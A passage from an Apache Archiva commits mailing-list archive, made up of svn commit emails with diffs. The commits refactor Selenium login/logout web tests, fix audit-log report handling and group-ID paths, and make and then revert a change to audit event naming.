"Submit" ); - - clickLinkWithText("Logout"); - login(username, getUserRolePassword()); + + logout(); + login(username, getUserRolePassword()); changePassword( getUserRolePassword(), getUserRoleNewPassword()); // this section will be removed if issue from redback after changing password will be fixed. getSelenium().goBack(); - clickLinkWithText("Logout"); - //assertTextPresent("You are already logged in."); + logout(); + //assertTextPresent("You are already logged in."); login(username, getUserRoleNewPassword()); assertLeftNavMenuWithRole( fullname ); - clickLinkWithText("Logout"); - login( getAdminUsername() , getAdminPassword() ); + logout(); + login( getAdminUsername() , getAdminPassword() ); } @Test (dependsOnMethods = { "testUserWithGuestRole" } ) @@ -76,20 +76,20 @@ clickLinkWithText( "Edit Roles" ); checkUserRoleWithValue( fullname ); clickButtonWithValue( "Submit" ); - - clickLinkWithText("Logout"); - login(username, getUserRolePassword()); + + logout(); + login(username, getUserRolePassword()); changePassword( getUserRolePassword(), getUserRoleNewPassword()); // this section will be removed if issue from redback after changing password will be fixed. getSelenium().goBack(); - clickLinkWithText("Logout"); - //assertTextPresent("You are already logged in."); + logout(); + //assertTextPresent("You are already logged in."); login(username, getUserRoleNewPassword()); assertLeftNavMenuWithRole( fullname ); - clickLinkWithText("Logout"); - login( getAdminUsername() , getAdminPassword() ); + logout(); + login( getAdminUsername() , getAdminPassword() ); } @Test (dependsOnMethods = { "testUserWithRegisteredUserRole" } ) @@ -103,20 +103,20 @@ clickLinkWithText( "Edit Roles" ); checkUserRoleWithValue( fullname ); clickButtonWithValue( "Submit" ); - - clickLinkWithText("Logout"); - login(username, getUserRolePassword()); + + logout(); + login(username, getUserRolePassword()); changePassword( getUserRolePassword(), getUserRoleNewPassword()); // this section will be removed if issue from redback after changing password will be fixed. getSelenium().goBack(); - clickLinkWithText("Logout"); - //assertTextPresent("You are already logged in."); + logout(); + //assertTextPresent("You are already logged in."); login(username, getUserRoleNewPassword()); assertLeftNavMenuWithRole( fullname ); - clickLinkWithText("Logout"); - login( getAdminUsername() , getAdminPassword() ); + logout(); + login( getAdminUsername() , getAdminPassword() ); } @Test (dependsOnMethods = { "testUserWithSysAdminUserRole" } ) @@ -130,20 +130,20 @@ clickLinkWithText( "Edit Roles" ); checkUserRoleWithValue( fullname ); clickButtonWithValue( "Submit" ); - - clickLinkWithText("Logout"); - login(username, getUserRolePassword()); + + logout(); + login(username, getUserRolePassword()); changePassword( getUserRolePassword(), getUserRoleNewPassword()); // this section will be removed if issue from redback after changing password will be fixed. getSelenium().goBack(); - clickLinkWithText("Logout"); - //assertTextPresent("You are already logged in."); + logout(); + //assertTextPresent("You are already logged in."); login(username, getUserRoleNewPassword()); assertLeftNavMenuWithRole( fullname ); - clickLinkWithText("Logout"); - login( getAdminUsername() , getAdminPassword() ); + logout(); + login( getAdminUsername() , getAdminPassword() ); } @Test (dependsOnMethods = { "testUserWithUserAdminUserRole" } ) @@ -157,20 +157,20 @@ clickLinkWithText( "Edit Roles" ); checkUserRoleWithValue( fullname ); clickButtonWithValue( "Submit" ); - - clickLinkWithText("Logout"); - login(username, getUserRolePassword()); + + logout(); + login(username, getUserRolePassword()); changePassword( getUserRolePassword(), getUserRoleNewPassword()); // this section will be removed if issue from redback after changing password will be fixed. getSelenium().goBack(); - clickLinkWithText("Logout"); - //assertTextPresent("You are already logged in."); + logout(); + //assertTextPresent("You are already logged in."); login(username, getUserRoleNewPassword()); assertLeftNavMenuWithRole( fullname ); - clickLinkWithText("Logout"); - login( getAdminUsername() , getAdminPassword() ); + logout(); + login( getAdminUsername() , getAdminPassword() ); } @Test (dependsOnMethods = { "testUserWithGlobalRepoManagerRole" } ) @@ -184,20 +184,20 @@ clickLinkWithText( "Edit Roles" ); checkUserRoleWithValue( fullname ); clickButtonWithValue( "Submit" ); - - clickLinkWithText("Logout"); - login(username, getUserRolePassword()); + + logout(); + login(username, getUserRolePassword()); changePassword( getUserRolePassword(), getUserRoleNewPassword()); // this section will be removed if issue from redback after changing password will be fixed. getSelenium().goBack(); - clickLinkWithText("Logout"); - //assertTextPresent("You are already logged in."); + logout(); + //assertTextPresent("You are already logged in."); login(username, getUserRoleNewPassword()); assertLeftNavMenuWithRole( fullname ); - clickLinkWithText("Logout"); - login( getAdminUsername() , getAdminPassword() ); + logout(); + login( getAdminUsername() , getAdminPassword() ); } @Test (dependsOnMethods = { "testUserWithGlobalRepoObserverRole" } ) @@ -211,20 +211,20 @@ clickLinkWithText( "Edit Roles" ); checkResourceRoleWithValue( fullname ); clickButtonWithValue( "Submit" ); - - clickLinkWithText("Logout"); - login(username, getUserRolePassword()); + + logout(); + login(username, getUserRolePassword()); changePassword( getUserRolePassword(), getUserRoleNewPassword()); // this section will be removed if issue from redback after changing password will be fixed. getSelenium().goBack(); - clickLinkWithText("Logout"); - //assertTextPresent("You are already logged in."); + logout(); + //assertTextPresent("You are already logged in."); login(username, getUserRoleNewPassword()); assertLeftNavMenuWithRole( fullname ); - clickLinkWithText("Logout"); - login( getAdminUsername() , getAdminPassword() ); + logout(); + login( getAdminUsername() , getAdminPassword() ); } /*@Test (dependsOnMethods = { "testUserWithRepoManagerInternalRole" } ) @@ -265,46 +265,46 @@ clickLinkWithText( "Edit Roles" ); checkResourceRoleWithValue( fullname ); clickButtonWithValue( "Submit" ); - - clickLinkWithText("Logout"); - login(username, getUserRolePassword()); + + logout(); + login(username, getUserRolePassword()); changePassword( getUserRolePassword(), getUserRoleNewPassword()); // this section will be removed if issue from redback after changing password will be fixed. getSelenium().goBack(); - clickLinkWithText("Logout"); - //assertTextPresent("You are already logged in."); + logout(); + //assertTextPresent("You are already logged in."); login(username, getUserRoleNewPassword()); assertLeftNavMenuWithRole( fullname ); - clickLinkWithText("Logout"); - login( getAdminUsername() , getAdminPassword() ); + logout(); + login( getAdminUsername() , getAdminPassword() ); } - - /*@Test (dependsOnMethods = { "testUserWithRepoObserverInternalRole" } ) - public void testUserWithRepoObserverSnapshotsRole() - { - username = getProperty( "REPOOBSERVER_SNAPSHOTS_USERNAME" ); - fullname = getProperty( "REPOOBSERVER_SNAPSHOTS_FULLNAME" ); - - createUser(username, fullname, getUserEmail(), getUserRolePassword(), true); - clickLinkWithText( username ); - clickLinkWithText( "Edit Roles" ); - checkResourceRoleWithValue( fullname ); - clickButtonWithValue( "Submit" ); - - clickLinkWithText("Logout"); - login(username, getUserRolePassword()); - changePassword( getUserRolePassword(), getUserRoleNewPassword()); - - // this section will be removed if issue from redback after changing password will be fixed. - getSelenium().goBack(); - clickLinkWithText("Logout"); - //assertTextPresent("You are already logged in."); - - login(username, getUserRoleNewPassword()); - assertLeftNavMenuWithRole( fullname ); - clickLinkWithText("Logout"); - login( getAdminUsername() , getAdminPassword() ); - }*/ + + /*@Test (dependsOnMethods = { "testUserWithRepoObserverInternalRole" } ) + public void testUserWithRepoObserverSnapshotsRole() + { + username = getProperty( "REPOOBSERVER_SNAPSHOTS_USERNAME" ); + fullname = getProperty( "REPOOBSERVER_SNAPSHOTS_FULLNAME" ); + + createUser(username, fullname, getUserEmail(), getUserRolePassword(), true); + clickLinkWithText( username ); + clickLinkWithText( "Edit Roles" ); + checkResourceRoleWithValue( fullname ); + clickButtonWithValue( "Submit" ); + + clickLinkWithText("Logout"); + login(username, getUserRolePassword()); + changePassword( getUserRolePassword(), getUserRoleNewPassword()); + + // this section will be removed if issue from redback after changing password will be fixed. + getSelenium().goBack(); + clickLinkWithText("Logout"); + //assertTextPresent("You are already logged in."); + + login(username, getUserRoleNewPassword()); + assertLeftNavMenuWithRole( fullname ); + clickLinkWithText("Logout"); + login( getAdminUsername() , getAdminPassword() ); + }*/ } Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java?rev=910389&r1=910388&r2=910389&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java Tue Feb 16 03:57:37 2010 @@ -118,8 +118,8 @@ submit(); if ( success ) { - assertAuthenticatedPage( username ); - } + assertUserLoggedIn( username ); + } else { assertLoginPage(); @@ -142,18 +142,8 @@ assertTextPresent( "Need an Account? Register!" ); assertTextPresent( "Forgot your Password? Request a password reset." ); } - - public void assertAuthenticatedPage( String username ) - { - assertTextPresent( "Current User" ); - assertTextPresent( "Edit Details" ); - assertTextPresent( "Logout" ); - assertTextNotPresent( "Login" ); - assertTextPresent( username ); - } - - - //User Management + + //User Management public void goToUserManagementPage() { clickLinkWithText( "User Management" ); @@ -278,6 +268,10 @@ submitLoginPage( username, password, false, valid, assertReturnPage ); } + if ( valid ) + { + assertUserLoggedIn( username ); + } } public void submitLoginPage( String username, String password ) @@ -304,10 +298,7 @@ if ( validUsernamePassword ) { - assertTextPresent( "Current User:" ); - assertTextPresent( username ); - assertLinkPresent( "Edit Details" ); - assertLinkPresent( "Logout" ); + assertUserLoggedIn( username ); } else { @@ -321,8 +312,17 @@ } } } - - // User Roles + + protected void assertUserLoggedIn( String username ) + { + assertTextPresent( "Current User:" ); + assertTextPresent( username ); + assertLinkPresent( "Edit Details" ); + assertLinkPresent( "Logout" ); + assertTextNotPresent( "Login" ); + } + + // User Roles public void assertUserRoleCheckBoxPresent(String value) { getSelenium() .isElementPresent("xpath=//input[@id='addRolesToUser_addNDSelectedRoles' and @name='addNDSelectedRoles' and @value='" + value + "']"); @@ -553,4 +553,13 @@ //TODO clickButtonWithValue( "Add Repository" ); } + + protected void logout() + { + clickLinkWithText("Logout"); + assertTextNotPresent( "Current User:" ); + assertLinkNotPresent( "Edit Details" ); + assertLinkNotPresent( "Logout" ); + assertLinkPresent( "Login" ); + } } From [email protected] Tue Feb 16 04:27:58 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 7078 invoked from network); 16 Feb 2010 04:27:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2010 04:27:58 -0000 Received: (qmail 34544 invoked by uid 500); 16 Feb 2010 04:27:58 -0000 Delivered-To: [email protected] Received: (qmail 34482 invoked by uid 500); 16 Feb 2010 04:27:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 34473 invoked by uid 99); 16 Feb 2010 04:27:57 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 04:27:57 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 04:27:55 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id BC6B42388993; Tue, 16 Feb 2010 04:27:33 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r910393 - in /archiva/branches/MRM-1025/archiva-modules/archiva-web: archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ Date: Tue, 16 Feb 2010 04:27:33 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Tue Feb 16 04:27:33 2010 New Revision: 910393 URL: http://svn.apache.org/viewvc?rev=910393&view=rev Log: correct test due to changed behaviour in audit log Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java?rev=910393&r1=910392&r2=910393&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Tue Feb 16 04:27:33 2010 @@ -99,12 +99,11 @@ submit(); assertAuditLogsReportPage(); - assertTextPresent( "Results" ); + assertTextPresent( "If you specify an artifact ID, you must specify a group ID" ); + assertTextNotPresent( "Results" ); assertTextNotPresent( "No audit logs found." ); - assertTextPresent( "testAddArtifactValidValues-1.0.jar" ); - assertTextPresent( "Uploaded File" ); - assertTextPresent( "internal" ); - assertTextPresent( "admin" ); + assertTextNotPresent( "testAddArtifactValidValues-1.0.jar" ); + assertTextNotPresent( "Uploaded File" ); } // TODO: add test for adding via WebDAV Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java?rev=910393&r1=910392&r2=910393&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java Tue Feb 16 04:27:33 2010 @@ -187,6 +187,7 @@ { // Until we store the full artifact metadata in the audit event, we can't query by these individually addActionError( "If you specify an artifact ID, you must specify a group ID" ); + auditLogs = null; return INPUT; } From [email protected] Tue Feb 16 05:07:45 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17511 invoked from network); 16 Feb 2010 05:07:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2010 05:07:45 -0000 Received: (qmail 57228 invoked by uid 500); 16 Feb 2010 05:07:45 -0000 Delivered-To: [email protected] Received: (qmail 57166 invoked by uid 500); 16 Feb 2010 05:07:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57157 invoked by uid 99); 16 Feb 2010 05:07:43 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 05:07:43 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 05:07:41 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D80A423889F1; Tue, 16 Feb 2010 05:07:20 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r910396 - /archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java Date: Tue, 16 Feb 2010 05:07:20 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Tue Feb 16 05:07:20 2010 New Revision: 910396 URL: http://svn.apache.org/viewvc?rev=910396&view=rev Log: [MRM-1304] fix group ID handling for branch Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java?rev=910396&r1=910395&r2=910396&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java Tue Feb 16 05:07:20 2010 @@ -194,13 +194,14 @@ String resource = null; if ( !StringUtils.isEmpty( groupId ) ) { + String groupIdAsPath = groupId.replace( '.', '/' ); if ( StringUtils.isEmpty( artifactId ) ) { - resource = groupId; + resource = groupIdAsPath; } else { - resource = groupId + "/" + artifactId; + resource = groupIdAsPath + "/" + artifactId; } } From [email protected] Tue Feb 16 05:34:24 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26119 invoked from network); 16 Feb 2010 05:34:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2010 05:34:24 -0000 Received: (qmail 73854 invoked by uid 500); 16 Feb 2010 05:34:23 -0000 Delivered-To: [email protected] Received: (qmail 73786 invoked by uid 500); 16 Feb 2010 05:34:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73777 invoked by uid 99); 16 Feb 2010 05:34:23 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 05:34:23 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 05:34:22 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 5F4A623889F1; Tue, 16 Feb 2010 05:34:02 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r910400 - in /archiva/branches/MRM-1025/archiva-modules: archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Date: Tue, 16 Feb 2010 05:34:02 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Tue Feb 16 05:34:01 2010 New Revision: 910400 URL: http://svn.apache.org/viewvc?rev=910400&view=rev Log: avoid timing issues with audit logs Modified: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java?rev=910400&r1=910399&r2=910400&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java Tue Feb 16 05:34:01 2010 @@ -126,7 +126,9 @@ { try { - timestamp = createNameFormat().parse( name ); + int index = name.lastIndexOf( '/' ); + String ts = index > 0 ? name.substring( 0, index ) : name; + timestamp = createNameFormat().parse( ts ); } catch ( ParseException e ) { @@ -211,7 +213,9 @@ public String getName() { - return createNameFormat().format( timestamp ); + // we add the resource name to the end to avoid clashes at that timestamp + // TODO: this is still not robust enough and the content model should be revised + return createNameFormat().format( timestamp ) + "/" + resource.substring( resource.lastIndexOf( '/' ) + 1 ); } private static SimpleDateFormat createNameFormat() Modified: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java?rev=910400&r1=910399&r2=910400&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Tue Feb 16 05:34:01 2010 @@ -138,16 +138,16 @@ return createTestEvent( TEST_REPO_ID, name ); } - private static AuditEvent createTestEvent( String repositoryId, String name ) + private static AuditEvent createTestEvent( String repositoryId, String t ) throws ParseException { AuditEvent event = new AuditEvent(); - event.setTimestamp( TIMESTAMP_FORMAT.parse( name ) ); + event.setTimestamp( TIMESTAMP_FORMAT.parse( AUDIT_EVENT_BASE + t ) ); event.setAction( AuditEvent.UPLOAD_FILE ); event.setRemoteIP( TEST_IP_ADDRESS ); event.setRepositoryId( repositoryId ); event.setUserId( TEST_USER ); - event.setResource( TEST_RESOURCE_BASE + "/" + name.substring( AUDIT_EVENT_BASE.length() ) ); + event.setResource( TEST_RESOURCE_BASE + "/" + t ); return event; } @@ -197,10 +197,11 @@ eventNames.put( TEST_REPO_ID_2, new ArrayList<String>() ); for ( int i = 0; i < numEvents; i++ ) { - String name = AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ); + String t = MILLIS_FORMAT.format( i ); + String name = AUDIT_EVENT_BASE + t + "/" + t; String repositoryId = i % 2 == 0 ? TEST_REPO_ID : TEST_REPO_ID_2; eventNames.get( repositoryId ).add( name ); - events.add( createTestEvent( repositoryId, name ) ); + events.add( createTestEvent( repositoryId, t ) ); } metadataRepositoryControl.expectAndReturn( From [email protected] Tue Feb 16 06:17:22 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45566 invoked from network); 16 Feb 2010 06:17:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2010 06:17:22 -0000 Received: (qmail 98483 invoked by uid 500); 16 Feb 2010 06:17:22 -0000 Delivered-To: [email protected] Received: (qmail 98420 invoked by uid 500); 16 Feb 2010 06:17:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98411 invoked by uid 99); 16 Feb 2010 06:17:22 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 06:17:22 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 06:17:21 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 470BF23889F1; Tue, 16 Feb 2010 06:17:01 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r910410 - in /archiva/branches/MRM-1025/archiva-modules: archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Date: Tue, 16 Feb 2010 06:17:01 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Tue Feb 16 06:17:00 2010 New Revision: 910410 URL: http://svn.apache.org/viewvc?rev=910410&view=rev Log: revert r910400, look for a simpler solution and unit test Modified: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java?rev=910410&r1=910409&r2=910410&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java Tue Feb 16 06:17:00 2010 @@ -126,9 +126,7 @@ { try { - int index = name.lastIndexOf( '/' ); - String ts = index > 0 ? name.substring( 0, index ) : name; - timestamp = createNameFormat().parse( ts ); + timestamp = createNameFormat().parse( name ); } catch ( ParseException e ) { @@ -213,9 +211,7 @@ public String getName() { - // we add the resource name to the end to avoid clashes at that timestamp - // TODO: this is still not robust enough and the content model should be revised - return createNameFormat().format( timestamp ) + "/" + resource.substring( resource.lastIndexOf( '/' ) + 1 ); + return createNameFormat().format( timestamp ); } private static SimpleDateFormat createNameFormat() Modified: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java?rev=910410&r1=910409&r2=910410&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Tue Feb 16 06:17:00 2010 @@ -138,16 +138,16 @@ return createTestEvent( TEST_REPO_ID, name ); } - private static AuditEvent createTestEvent( String repositoryId, String t ) + private static AuditEvent createTestEvent( String repositoryId, String name ) throws ParseException { AuditEvent event = new AuditEvent(); - event.setTimestamp( TIMESTAMP_FORMAT.parse( AUDIT_EVENT_BASE + t ) ); + event.setTimestamp( TIMESTAMP_FORMAT.parse( name ) ); event.setAction( AuditEvent.UPLOAD_FILE ); event.setRemoteIP( TEST_IP_ADDRESS ); event.setRepositoryId( repositoryId ); event.setUserId( TEST_USER ); - event.setResource( TEST_RESOURCE_BASE + "/" + t ); + event.setResource( TEST_RESOURCE_BASE + "/" + name.substring( AUDIT_EVENT_BASE.length() ) ); return event; } @@ -197,11 +197,10 @@ eventNames.put( TEST_REPO_ID_2, new ArrayList<String>() ); for ( int i = 0; i < numEvents; i++ ) { - String t = MILLIS_FORMAT.format( i ); - String name = AUDIT_EVENT_BASE + t + "/" + t; + String name = AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ); String repositoryId = i % 2 == 0 ? TEST_REPO_ID : TEST_REPO_ID_2; eventNames.get( repositoryId ).add( name ); - events.add( createTestEvent( repositoryId, t ) ); + events.add( createTestEvent( repositoryId, name ) ); } metadataRepositoryControl.expectAndReturn( From [email protected] Tue Feb 16 08:15:51 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90076 invoked from network); 16 Feb 2010 08:15:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2010 08:15:51 -0000 Received: (qmail 84823 invoked by uid 500); 16 Feb 2010 08:15:51 -0000 Delivered-To: [email protected] Received: (qmail 84762 invoked by uid 500); 16 Feb 2010 08:15:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84748 invoked by uid 99); 16 Feb 2010 08:15:50 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 08:15:50 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 